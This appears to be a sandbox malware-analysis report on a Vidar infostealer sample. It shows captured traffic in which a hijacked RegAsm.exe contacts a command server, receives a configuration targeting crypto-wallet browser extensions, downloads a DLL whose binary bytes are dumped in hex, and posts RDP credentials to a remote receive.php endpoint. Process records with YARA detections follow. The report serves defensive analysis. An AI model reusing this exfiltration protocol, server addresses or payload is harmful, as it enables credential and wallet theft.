2024-09-26 23:38:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"3b9d4652341dd8028dcc514d953f2846------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GHDBAFIIECBFHIEBKJJKCont
2024-09-26 23:38:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:54 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49758	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:55 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:55 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"3b9d4652341dd8028dcc514d953f2846------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------CFCBFBGDBKJKECAAKKFHCont
2024-09-26 23:38:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:56 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49759	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:57 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6345 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:57 UTC	6345	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"3b9d4652341dd8028dcc514d953f2846------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FBKEHJEGCFBFHJJKJEHDCont
2024-09-26 23:38:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:58 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49760	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:58 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:59 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:58 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:38:58 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:38:59 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 23:38:59 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49761	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:39:01 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:39:01 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"3b9d4652341dd8028dcc514d953f2846------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FHDAEHDAKECGCAKFCFIJCont
2024-09-26 23:39:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:39:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:39:02 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49765	188.114.96.3	443	6956	C:\ProgramData\CFHIIEHJKK.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:39:03 UTC	165	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: hansgborn.eu Content-Length: 58 Expect: 100-continue Connection: Keep-Alive
2024-09-26 23:39:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-26 23:39:03 UTC	58	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 30 64 34 35 37 37 34 34 26 70 61 73 73 77 6f 72 64 3d 65 55 36 66 6d 56 73 58 48 4e 55 56 Data Ascii: ip=8.46.123.33&user=RDPUser_0d457744&password=eU6fmVsXHNUV
2024-09-26 23:39:04 UTC	607	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:39:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YOUSNd6GUcWZyF%2Fi%2F2Kw92ujL%2Blj5fMCXClHCXES6Kdh2EgM88ixPpsO%2BpkgTkb7XUkQrI11Rj0%2FPdxGQHtTs%2Bz27M5sTk4Sf4YXxhRXJxNqSSL9D2YWf1ZSQ5kvw30%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971754abdd43a4-EWR 0

Target ID:	2
Start time:	19:37:08
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe80000
File size:	413'224 bytes
MD5 hash:	2FF6B812F5CA9D29A5007366F38B6F34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:37:08
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:37:09
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:37:09
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x560000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
